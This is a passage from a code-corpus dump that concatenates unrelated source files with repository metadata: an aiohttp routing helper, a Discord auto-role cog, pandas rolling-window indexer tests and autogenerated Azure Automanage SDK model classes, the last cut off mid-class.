    BUGFIX: the negative path used to fall off the end and implicitly return
    None; it now always returns a bool.  Callers only truth-test the result,
    so this is backward-compatible.
    """
    return any(param.kind == inspect.Parameter.KEYWORD_ONLY
               for param in inspect.signature(fn).parameters.values())
def has_var_kw_arg(fn):
    """Return True if *fn* declares a ``**kwargs``-style parameter.

    BUGFIX: the negative path used to fall off the end and implicitly return
    None; it now always returns a bool.  Callers only truth-test the result,
    so this is backward-compatible.
    """
    return any(param.kind == inspect.Parameter.VAR_KEYWORD
               for param in inspect.signature(fn).parameters.values())
def has_request_arg(fn):
    """Return True if *fn* declares a parameter named ``request``.

    Raises ValueError when ``request`` is followed by a plain positional
    parameter: ``request`` must be the last named positional parameter
    (only *args, keyword-only and **kwargs may come after it).
    """
    sig = inspect.signature(fn)
    found = False
    for name, param in sig.parameters.items():
        if name == 'request':
            found = True
            continue
        if not found:
            continue
        allowed_after = (inspect.Parameter.VAR_POSITIONAL,
                         inspect.Parameter.KEYWORD_ONLY,
                         inspect.Parameter.VAR_KEYWORD)
        if param.kind not in allowed_after:
            raise ValueError(
                'request parameter must be the last named parameter in function: %s%s' % (fn.__name__, str(sig)))
    return found
class RequestHandler(object):
    """
    Wraps a handler function and marshals the request's parameters into
    keyword arguments before invoking it.
    """
    def __init__(self, app, fn):
        self._app = app
        self._func = fn
        # Pre-compute the handler's signature properties once at registration.
        self._has_request_arg = has_request_arg(fn)
        self._has_var_kw_arg = has_var_kw_arg(fn)
        self._has_named_kw_args = has_named_kw_args(fn)
        self._named_kw_args = get_named_kw_args(fn)
        self._required_kw_args = get_required_kw_args(fn)
    async def __call__(self, request):
        """
        Extract arguments from the JSON/form body, the query string and the
        URL match info, then call the wrapped handler.

        Implementing __call__ lets an instance be used directly as an
        aiohttp handler: ``instance(request)``.

        :param request: aiohttp request object
        :return: the handler's result, or an error dict for APIError
        """
        kw = None
        # Only parse the body/query string if the handler takes kw arguments.
        if self._has_var_kw_arg or self._has_named_kw_args or self._required_kw_args:
            if request.method == 'POST':
                if not request.content_type:
                    return web.HTTPBadRequest('Missing Content-Type.')
                ct = request.content_type.lower()
                if ct.startswith('application/json'):
                    params = await request.json()
                    if not isinstance(params, dict):
                        return web.HTTPBadRequest('JSON body must be object.')
                    kw = params
                elif ct.startswith('application/x-www-form-urlencoded') or ct.startswith('multipart/form-data'):
                    params = await request.post()
                    kw = dict(**params)
                else:
                    return web.HTTPBadRequest('Unsupported Content-Type: %s' % request.content_type)
            if request.method == 'GET':
                qs = request.query_string
                if qs:
                    # parse_qs yields lists; keep only the first value per key.
                    kw = dict()
                    for k, v in parse.parse_qs(qs, True).items():
                        kw[k] = v[0]
        if kw is None:
            # No body/query arguments: use the URL path parameters.
            kw = dict(**request.match_info)
        else:
            if not self._has_var_kw_arg and self._named_kw_args:
                # No **kwargs on the handler: keep only its declared
                # keyword-only parameters.
                copy = dict()
                for name in self._named_kw_args:
                    if name in kw:
                        copy[name] = kw[name]
                kw = copy
            # URL path parameters override body/query values of the same name.
            for k, v in request.match_info.items():
                if k in kw:
                    logging.warning('Duplicate arg name in named arg and kw args: %s' % k)
                kw[k] = v
        if self._has_request_arg:
            kw['request'] = request
        # Reject the call early if a required keyword argument is missing.
        if self._required_kw_args:
            for name in self._required_kw_args:
                if not name in kw:
                    return web.HTTPBadRequest('Missing argument: %s' % name)
        logging.info('call with args: %s' % str(kw))
        try:
            r = await self._func(**kw)
            return r
        except APIError as e:
            # Translate application-level errors into a JSON-serializable dict.
            return dict(error=e.error, data=e.data, message=e.message)
def add_static(app):
    """Register the local ./static directory under the /static/ URL prefix.

    Both the URL prefix and the directory location (relative to this module)
    are currently hard-coded.

    :param app: server application whose router receives the static route
    """
    static_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'static')
    # URL prefix, folder path
    app.router.add_static('/static/', static_dir)
    logging.info('add static %s => %s' % ('/static/', static_dir))
def add_route(app, fn):
    """
    Register a single URL handler on the app's UrlDispatcher.

    *fn* must carry the ``__method__`` (HTTP verb) and ``__route__`` (URL
    path) attributes set by the @get/@post decorators, otherwise ValueError
    is raised.  Plain functions are wrapped into coroutines before
    registration.

    :param app: server application to register the mapping on
    :param fn: handler function decorated with @get or @post
    """
    method = getattr(fn, '__method__', None)
    path = getattr(fn, '__route__', None)
    if path is None or method is None:
        raise ValueError('@get or @post not defined in %s.' % str(fn))
    if not asyncio.iscoroutinefunction(fn) and not inspect.isgeneratorfunction(fn):
        # NOTE(review): asyncio.coroutine is deprecated since Python 3.8 and
        # removed in 3.12 -- this needs reworking before a Python upgrade.
        fn = asyncio.coroutine(fn)
    logging.info(
        'add route %s %s => %s(%s)' % (method, path, fn.__name__, ', '.join(inspect.signature(fn).parameters.keys())))
    # HTTP verb, request path, handler (wrapped for argument marshalling).
    app.router.add_route(method, path, RequestHandler(app, fn))
def add_routes(app, *module_name):
    """
    Import the given handler modules and register every public callable that
    carries ``__method__`` and ``__route__`` (i.e. was decorated with
    @get/@post).

    Module names that do not match ``_RE_HANDLE_NAME`` (ending in "handler")
    are silently skipped.

    :param app: server application to register the mappings on
    :param module_name: dotted module names containing the handlers
    """
    for module in module_name:
        if not _RE_HANDLE_NAME.match(module):
            continue
        n = module.rfind('.')
        if n == (-1):
            # __import__ is the interpreter-level import hook, roughly
            # equivalent to "import module"; globals()/locals() supply the
            # importing namespace.
            mod = __import__(module, globals(), locals())
        else:
            # Dotted name: import the package, then fetch the submodule.
            name = module[n + 1:]
            mod = getattr(__import__(module[:n], globals(), locals(), [name]), name)
        for attr in dir(mod):
            if attr.startswith('_'):
                continue
            fn = getattr(mod, attr)
            if callable(fn):
                method = getattr(fn, '__method__', None)
                path = getattr(fn, '__route__', None)
                if method and path:
                    add_route(app, fn)
| 30.688462
| 118
| 0.577265
|
4a0212bd7afea26839a4d034679cd7fd8d24b780
| 1,253
|
py
|
Python
|
cogs/newcomers.py
|
lifehackerhansol/Sycamore
|
39b4574cd8224c2b4927992cadf22e4c4c368bd1
|
[
"0BSD"
] | null | null | null |
cogs/newcomers.py
|
lifehackerhansol/Sycamore
|
39b4574cd8224c2b4927992cadf22e4c4c368bd1
|
[
"0BSD"
] | 4
|
2021-05-25T06:48:00.000Z
|
2022-02-03T18:41:57.000Z
|
cogs/newcomers.py
|
lifehackerhansol/Sycamore
|
39b4574cd8224c2b4927992cadf22e4c4c368bd1
|
[
"0BSD"
] | null | null | null |
#
# ISC License
#
# Copyright (C) 2021 DS-Homebrew
# Copyright (C) 2021-present lifehackerhansol
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import discord
from discord.ext import commands
from settings import auto_role
class Newcomers(commands.Cog):
    """Cog that hands the configured automatic role to every new member."""

    def __init__(self, bot):
        self.bot = bot

    @commands.Cog.listener()
    async def on_member_join(self, member):
        # Resolve the configured role by name within the joining member's guild.
        new_role = discord.utils.get(member.guild.roles, name=auto_role)
        await member.add_roles(new_role)
def setup(bot):
    """Entry point used by the bot framework to register this cog."""
    bot.add_cog(Newcomers(bot))
| 29.833333
| 74
| 0.742219
|
4a0212e890d3ad287e083c26840ed54beef36e8a
| 8,157
|
py
|
Python
|
.venv/lib/python3.8/site-packages/pandas/tests/window/test_base_indexer.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 115
|
2020-06-18T15:00:58.000Z
|
2022-03-02T10:13:19.000Z
|
.venv/lib/python3.8/site-packages/pandas/tests/window/test_base_indexer.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 21
|
2021-04-13T01:17:40.000Z
|
2022-03-11T16:06:50.000Z
|
.venv/lib/python3.8/site-packages/pandas/tests/window/test_base_indexer.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 60
|
2020-07-22T14:53:10.000Z
|
2022-03-23T10:17:59.000Z
|
import numpy as np
import pytest
from pandas import DataFrame, Series, date_range
import pandas._testing as tm
from pandas.api.indexers import BaseIndexer, FixedForwardWindowIndexer
from pandas.core.window.indexers import ExpandingIndexer, VariableOffsetWindowIndexer
from pandas.tseries.offsets import BusinessDay
def test_bad_get_window_bounds_signature():
    # An indexer whose get_window_bounds has the wrong signature is rejected.
    class BadIndexer(BaseIndexer):
        def get_window_bounds(self):
            return None

    with pytest.raises(ValueError, match="BadIndexer does not implement"):
        Series(range(5)).rolling(BadIndexer())
def test_expanding_indexer():
    # Rolling driven by an ExpandingIndexer must match Series.expanding.
    ser = Series(range(10))
    result = ser.rolling(ExpandingIndexer()).mean()
    tm.assert_series_equal(result, ser.expanding().mean())
def test_indexer_constructor_arg():
    # Example found in computation.rst: BaseIndexer constructor kwargs
    # become attributes available inside get_window_bounds.
    use_expanding = [True, False, True, False, True]
    df = DataFrame({"values": range(5)})

    class CustomIndexer(BaseIndexer):
        def get_window_bounds(self, num_values, min_periods, center, closed):
            start = np.empty(num_values, dtype=np.int64)
            end = np.empty(num_values, dtype=np.int64)
            for i in range(num_values):
                if self.use_expanding[i]:
                    start[i], end[i] = 0, i + 1
                else:
                    start[i], end[i] = i, i + self.window_size
            return start, end

    result = df.rolling(CustomIndexer(window_size=1, use_expanding=use_expanding)).sum()
    tm.assert_frame_equal(result, DataFrame({"values": [0.0, 1.0, 3.0, 3.0, 10.0]}))
def test_indexer_accepts_rolling_args():
    # get_window_bounds receives the arguments passed to rolling().
    df = DataFrame({"values": range(5)})

    class CustomIndexer(BaseIndexer):
        def get_window_bounds(self, num_values, min_periods, center, closed):
            start = np.empty(num_values, dtype=np.int64)
            end = np.empty(num_values, dtype=np.int64)
            for i in range(num_values):
                if center and min_periods == 1 and closed == "both" and i == 2:
                    start[i], end[i] = 0, num_values
                else:
                    start[i], end[i] = i, i + self.window_size
            return start, end

    rolling = df.rolling(CustomIndexer(window_size=1), center=True, min_periods=1, closed="both")
    tm.assert_frame_equal(rolling.sum(), DataFrame({"values": [0.0, 1.0, 10.0, 3.0, 4.0]}))
def test_win_type_not_implemented():
    # Weighted (win_type) windows are not supported with custom indexers.
    class CustomIndexer(BaseIndexer):
        def get_window_bounds(self, num_values, min_periods, center, closed):
            return np.array([0, 1]), np.array([1, 2])

    frame = DataFrame({"values": range(2)})
    with pytest.raises(NotImplementedError, match="BaseIndexer subclasses not"):
        frame.rolling(CustomIndexer(), win_type="boxcar")
@pytest.mark.parametrize("constructor", [Series, DataFrame])
@pytest.mark.parametrize(
    "func,np_func,expected,np_kwargs",
    [
        ("count", len, [3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 2.0, np.nan], {},),
        ("min", np.min, [0.0, 1.0, 2.0, 3.0, 4.0, 6.0, 6.0, 7.0, 8.0, np.nan], {},),
        (
            "max",
            np.max,
            [2.0, 3.0, 4.0, 100.0, 100.0, 100.0, 8.0, 9.0, 9.0, np.nan],
            {},
        ),
        (
            "std",
            np.std,
            [
                1.0,
                1.0,
                1.0,
                55.71654452,
                54.85739087,
                53.9845657,
                1.0,
                1.0,
                0.70710678,
                np.nan,
            ],
            {"ddof": 1},
        ),
        (
            "var",
            np.var,
            [
                1.0,
                1.0,
                1.0,
                3104.333333,
                3009.333333,
                2914.333333,
                1.0,
                1.0,
                0.500000,
                np.nan,
            ],
            {"ddof": 1},
        ),
        (
            "median",
            np.median,
            [1.0, 2.0, 3.0, 4.0, 6.0, 7.0, 7.0, 8.0, 8.5, np.nan],
            {},
        ),
    ],
)
def test_rolling_forward_window(constructor, func, np_func, expected, np_kwargs):
    # GH 32865
    # Forward-looking fixed windows: center=True and closed= are rejected,
    # and the aggregation result must match both the hard-coded expectation
    # and rolling.apply(np_func).
    values = np.arange(10)
    values[5] = 100.0
    indexer = FixedForwardWindowIndexer(window_size=3)
    match = "Forward-looking windows can't have center=True"
    with pytest.raises(ValueError, match=match):
        rolling = constructor(values).rolling(window=indexer, center=True)
        result = getattr(rolling, func)()
    match = "Forward-looking windows don't support setting the closed argument"
    with pytest.raises(ValueError, match=match):
        rolling = constructor(values).rolling(window=indexer, closed="right")
        result = getattr(rolling, func)()
    rolling = constructor(values).rolling(window=indexer, min_periods=2)
    result = getattr(rolling, func)()
    # Check that the function output matches the explicitly provided array
    expected = constructor(expected)
    tm.assert_equal(result, expected)
    # Check that the rolling function output matches applying an alternative
    # function to the rolling window object
    expected2 = constructor(rolling.apply(lambda x: np_func(x, **np_kwargs)))
    tm.assert_equal(result, expected2)
    # Check that the function output matches applying an alternative function
    # if min_periods isn't specified
    rolling3 = constructor(values).rolling(window=indexer)
    result3 = getattr(rolling3, func)()
    expected3 = constructor(rolling3.apply(lambda x: np_func(x, **np_kwargs)))
    tm.assert_equal(result3, expected3)
@pytest.mark.parametrize("constructor", [Series, DataFrame])
def test_rolling_forward_skewness(constructor):
    # Forward-looking window skewness over values with one large outlier.
    values = np.arange(10)
    values[5] = 100.0
    indexer = FixedForwardWindowIndexer(window_size=5)
    result = constructor(values).rolling(window=indexer, min_periods=3).skew()
    expected = constructor(
        [0.0, 2.232396, 2.229508, 2.228340, 2.229091, 2.231989, 0.0, 0.0, np.nan, np.nan]
    )
    tm.assert_equal(result, expected)
@pytest.mark.parametrize(
    "func,expected",
    [
        ("cov", [2.0, 2.0, 2.0, 97.0, 2.0, -93.0, 2.0, 2.0, np.nan, np.nan],),
        (
            "corr",
            [
                1.0,
                1.0,
                1.0,
                0.8704775290207161,
                0.018229084250926637,
                -0.861357304646493,
                1.0,
                1.0,
                np.nan,
                np.nan,
            ],
        ),
    ],
)
def test_rolling_forward_cov_corr(func, expected):
    # Pairwise cov/corr over a forward-looking fixed window of size 3; the
    # second column is 2x the first, with one outlier injected.
    values1 = np.arange(10).reshape(-1, 1)
    values2 = values1 * 2
    values1[5, 0] = 100
    values = np.concatenate([values1, values2], axis=1)
    indexer = FixedForwardWindowIndexer(window_size=3)
    rolling = DataFrame(values).rolling(window=indexer, min_periods=3)
    # We are interested in checking only pairwise covariance / correlation
    result = getattr(rolling, func)().loc[(slice(None), 1), 0]
    result = result.reset_index(drop=True)
    expected = Series(expected)
    expected.name = result.name
    tm.assert_equal(result, expected)
@pytest.mark.parametrize(
"closed,expected_data",
[
["right", [0.0, 1.0, 2.0, 3.0, 7.0, 12.0, 6.0, 7.0, 8.0, 9.0]],
["left", [0.0, 0.0, 1.0, 2.0, 5.0, 9.0, 5.0, 6.0, 7.0, 8.0]],
],
)
def test_non_fixed_variable_window_indexer(closed, expected_data):
index = date_range("2020", periods=10)
df = DataFrame(range(10), index=index)
offset = BusinessDay(1)
indexer = VariableOffsetWindowIndexer(index=index, offset=offset)
result = df.rolling(indexer, closed=closed).sum()
expected = DataFrame(expected_data, index=index)
tm.assert_frame_equal(result, expected)
| 31.863281
| 85
| 0.572147
|
4a02132654d4953ef71138b04fa109e55841e150
| 26,904
|
py
|
Python
|
sdk/automanage/azure-mgmt-automanage/azure/mgmt/automanage/models/_models.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/automanage/azure-mgmt-automanage/azure/mgmt/automanage/models/_models.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/automanage/azure-mgmt-automanage/azure/mgmt/automanage/models/_models.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class Resource(msrest.serialization.Model):
    """Base fields common to every ARM resource.

    All variables are populated by the server and ignored when sending a request.

    :ivar id: Fully qualified resource Id for the resource. Ex -
     /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
    :vartype id: str
    :ivar name: The name of the resource.
    :vartype name: str
    :ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
     Microsoft.Storage/storageAccounts.
    :vartype type: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Server-populated, read-only fields.
        self.id = None
        self.name = None
        self.type = None
class TrackedResource(Resource):
    """ARM tracked top-level resource: a Resource plus tags and a required location.

    Server-populated variables are read-only and ignored on requests.
    All required parameters must be populated in order to send to Azure.

    :ivar id: Fully qualified resource Id for the resource. Ex -
     /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
    :vartype id: str
    :ivar name: The name of the resource.
    :vartype name: str
    :ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
     Microsoft.Storage/storageAccounts.
    :vartype type: str
    :param tags: A set of tags. Resource tags.
    :type tags: dict[str, str]
    :param location: Required. The geo-location where the resource lives.
    :type location: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'location': {'required': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'location': {'key': 'location', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.tags = kwargs.get('tags')
        # Required: raises KeyError if the caller omits it.
        self.location = kwargs['location']
class Account(TrackedResource):
    """An Automanage account resource.

    Server-populated variables are read-only and ignored on requests.
    All required parameters must be populated in order to send to Azure.

    :ivar id: Fully qualified resource Id for the resource. Ex -
     /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
    :vartype id: str
    :ivar name: The name of the resource.
    :vartype name: str
    :ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
     Microsoft.Storage/storageAccounts.
    :vartype type: str
    :param tags: A set of tags. Resource tags.
    :type tags: dict[str, str]
    :param location: Required. The geo-location where the resource lives.
    :type location: str
    :param identity: The identity of the Automanage account.
    :type identity: ~automanage_client.models.AccountIdentity
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'location': {'required': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'location': {'key': 'location', 'type': 'str'},
        'identity': {'key': 'identity', 'type': 'AccountIdentity'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.identity = kwargs.get('identity')
class AccountIdentity(msrest.serialization.Model):
    """Managed identity attached to an Automanage account.

    Server-populated variables are read-only and ignored on requests.

    :ivar principal_id: The principal id of Automanage account identity.
    :vartype principal_id: str
    :ivar tenant_id: The tenant id associated with the Automanage account.
    :vartype tenant_id: str
    :param type: The type of identity used for the Automanage account. Currently, the only
     supported type is 'SystemAssigned', which implicitly creates an identity. Possible values
     include: "SystemAssigned", "None".
    :type type: str or ~automanage_client.models.ResourceIdentityType
    """

    _validation = {
        'principal_id': {'readonly': True},
        'tenant_id': {'readonly': True},
    }

    _attribute_map = {
        'principal_id': {'key': 'principalId', 'type': 'str'},
        'tenant_id': {'key': 'tenantId', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # principal_id / tenant_id come back from the service only.
        self.principal_id = None
        self.tenant_id = None
        self.type = kwargs.get('type')
class AccountList(msrest.serialization.Model):
    """Response payload of the list Account operation.

    :param value: Result of the list Account operation.
    :type value: list[~automanage_client.models.Account]
    """

    _attribute_map = {
        'value': {'key': 'value', 'type': '[Account]'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.value = kwargs.get('value')
class UpdateResource(msrest.serialization.Model):
    """Base model for PATCH-style update requests (tags only).

    :param tags: A set of tags. The tags of the resource.
    :type tags: dict[str, str]
    """

    _attribute_map = {
        'tags': {'key': 'tags', 'type': '{str}'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.tags = kwargs.get('tags')
class AccountUpdate(UpdateResource):
    """Update payload for an Automanage account.

    :param tags: A set of tags. The tags of the resource.
    :type tags: dict[str, str]
    :param identity: The identity of the Automanage account.
    :type identity: ~automanage_client.models.AccountIdentity
    """

    _attribute_map = {
        'tags': {'key': 'tags', 'type': '{str}'},
        'identity': {'key': 'identity', 'type': 'AccountIdentity'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.identity = kwargs.get('identity')
class ConfigurationProfileAssignment(Resource):
    """Association between a VM and an Automanage configuration profile.

    Server-populated variables are read-only and ignored on requests.

    :ivar id: Fully qualified resource Id for the resource. Ex -
     /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
    :vartype id: str
    :ivar name: The name of the resource.
    :vartype name: str
    :ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
     Microsoft.Storage/storageAccounts.
    :vartype type: str
    :param properties: Properties of the configuration profile assignment.
    :type properties: ~automanage_client.models.ConfigurationProfileAssignmentProperties
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'properties': {'key': 'properties', 'type': 'ConfigurationProfileAssignmentProperties'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.properties = kwargs.get('properties')
class ConfigurationProfileAssignmentCompliance(msrest.serialization.Model):
    """Compliance status of a configuration profile assignment.

    Server-populated variables are read-only and ignored on requests.

    :ivar update_status: The state of compliance, which only appears in the response. Possible
     values include: "Succeeded", "Failed", "Created".
    :vartype update_status: str or ~automanage_client.models.UpdateStatus
    """

    _validation = {
        'update_status': {'readonly': True},
    }

    _attribute_map = {
        'update_status': {'key': 'updateStatus', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Populated by the service only.
        self.update_status = None
class ConfigurationProfileAssignmentList(msrest.serialization.Model):
    """Response payload of the list configuration profile assignment operation.

    :param value: Result of the list configuration profile assignment operation.
    :type value: list[~automanage_client.models.ConfigurationProfileAssignment]
    """

    _attribute_map = {
        'value': {'key': 'value', 'type': '[ConfigurationProfileAssignment]'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.value = kwargs.get('value')
class ConfigurationProfileAssignmentProperties(msrest.serialization.Model):
    """Properties of an Automanage configuration profile assignment.

    Server-populated variables are read-only and ignored on requests.

    :param configuration_profile: A value indicating configuration profile. Possible values
     include: "Azure virtual machine best practices – Dev/Test", "Azure virtual machine best
     practices – Production".
    :type configuration_profile: str or ~automanage_client.models.ConfigurationProfile
    :param target_id: The target VM resource URI.
    :type target_id: str
    :param account_id: The Automanage account ARM Resource URI.
    :type account_id: str
    :param configuration_profile_preference_id: The configuration profile custom preferences ARM
     resource URI.
    :type configuration_profile_preference_id: str
    :ivar provisioning_status: The state of onboarding, which only appears in the response.
     Possible values include: "Succeeded", "Failed", "Created".
    :vartype provisioning_status: str or ~automanage_client.models.ProvisioningStatus
    :param compliance: The configuration setting for the configuration profile.
    :type compliance: ~automanage_client.models.ConfigurationProfileAssignmentCompliance
    """

    _validation = {
        'provisioning_status': {'readonly': True},
    }

    _attribute_map = {
        'configuration_profile': {'key': 'configurationProfile', 'type': 'str'},
        'target_id': {'key': 'targetId', 'type': 'str'},
        'account_id': {'key': 'accountId', 'type': 'str'},
        'configuration_profile_preference_id': {'key': 'configurationProfilePreferenceId', 'type': 'str'},
        'provisioning_status': {'key': 'provisioningStatus', 'type': 'str'},
        'compliance': {'key': 'compliance', 'type': 'ConfigurationProfileAssignmentCompliance'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.configuration_profile = kwargs.get('configuration_profile')
        self.target_id = kwargs.get('target_id')
        self.account_id = kwargs.get('account_id')
        self.configuration_profile_preference_id = kwargs.get('configuration_profile_preference_id')
        # Read-only: reported by the service.
        self.provisioning_status = None
        self.compliance = kwargs.get('compliance')
class ConfigurationProfilePreference(TrackedResource):
    """A configuration profile preference resource.

    Server-populated variables are read-only and ignored on requests.
    All required parameters must be populated in order to send to Azure.

    :ivar id: Fully qualified resource Id for the resource. Ex -
     /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
    :vartype id: str
    :ivar name: The name of the resource.
    :vartype name: str
    :ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
     Microsoft.Storage/storageAccounts.
    :vartype type: str
    :param tags: A set of tags. Resource tags.
    :type tags: dict[str, str]
    :param location: Required. The geo-location where the resource lives.
    :type location: str
    :param properties: Properties of the configuration profile preference.
    :type properties: ~automanage_client.models.ConfigurationProfilePreferenceProperties
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'location': {'required': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'location': {'key': 'location', 'type': 'str'},
        'properties': {'key': 'properties', 'type': 'ConfigurationProfilePreferenceProperties'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.properties = kwargs.get('properties')
class ConfigurationProfilePreferenceAntiMalware(msrest.serialization.Model):
    """Antimalware preferences for an Automanage configuration profile.

    :param enable_real_time_protection: Enables or disables Real Time Protection. Possible values
     include: "True", "False".
    :type enable_real_time_protection: str or ~automanage_client.models.EnableRealTimeProtection
    :param exclusions: Extensions, Paths and Processes that must be excluded from scan.
    :type exclusions: object
    :param run_scheduled_scan: Enables or disables a periodic scan for antimalware. Possible values
     include: "True", "False".
    :type run_scheduled_scan: str or ~automanage_client.models.RunScheduledScan
    :param scan_type: Type of scheduled scan. Possible values include: "Quick", "Full".
    :type scan_type: str or ~automanage_client.models.ScanType
    :param scan_day: Schedule scan settings day.
    :type scan_day: str
    :param scan_time_in_minutes: Schedule scan settings time.
    :type scan_time_in_minutes: str
    """

    _attribute_map = {
        'enable_real_time_protection': {'key': 'enableRealTimeProtection', 'type': 'str'},
        'exclusions': {'key': 'exclusions', 'type': 'object'},
        'run_scheduled_scan': {'key': 'runScheduledScan', 'type': 'str'},
        'scan_type': {'key': 'scanType', 'type': 'str'},
        'scan_day': {'key': 'scanDay', 'type': 'str'},
        'scan_time_in_minutes': {'key': 'scanTimeInMinutes', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.enable_real_time_protection = kwargs.get('enable_real_time_protection')
        self.exclusions = kwargs.get('exclusions')
        self.run_scheduled_scan = kwargs.get('run_scheduled_scan')
        self.scan_type = kwargs.get('scan_type')
        self.scan_day = kwargs.get('scan_day')
        self.scan_time_in_minutes = kwargs.get('scan_time_in_minutes')
class ConfigurationProfilePreferenceList(msrest.serialization.Model):
    """Response payload of the list ConfigurationProfilePreference operation.

    :param value: Result of the list ConfigurationProfilePreference operation.
    :type value: list[~automanage_client.models.ConfigurationProfilePreference]
    """

    _attribute_map = {
        'value': {'key': 'value', 'type': '[ConfigurationProfilePreference]'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.value = kwargs.get('value')
class ConfigurationProfilePreferenceProperties(msrest.serialization.Model):
    """Custom preference settings carried by a configuration profile preference.

    :param vm_backup: The custom preferences for Azure VM Backup.
    :type vm_backup: ~automanage_client.models.ConfigurationProfilePreferenceVmBackup
    :param anti_malware: The custom preferences for Azure Antimalware.
    :type anti_malware: ~automanage_client.models.ConfigurationProfilePreferenceAntiMalware
    """

    _attribute_map = {
        'vm_backup': {'key': 'vmBackup', 'type': 'ConfigurationProfilePreferenceVmBackup'},
        'anti_malware': {'key': 'antiMalware', 'type': 'ConfigurationProfilePreferenceAntiMalware'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
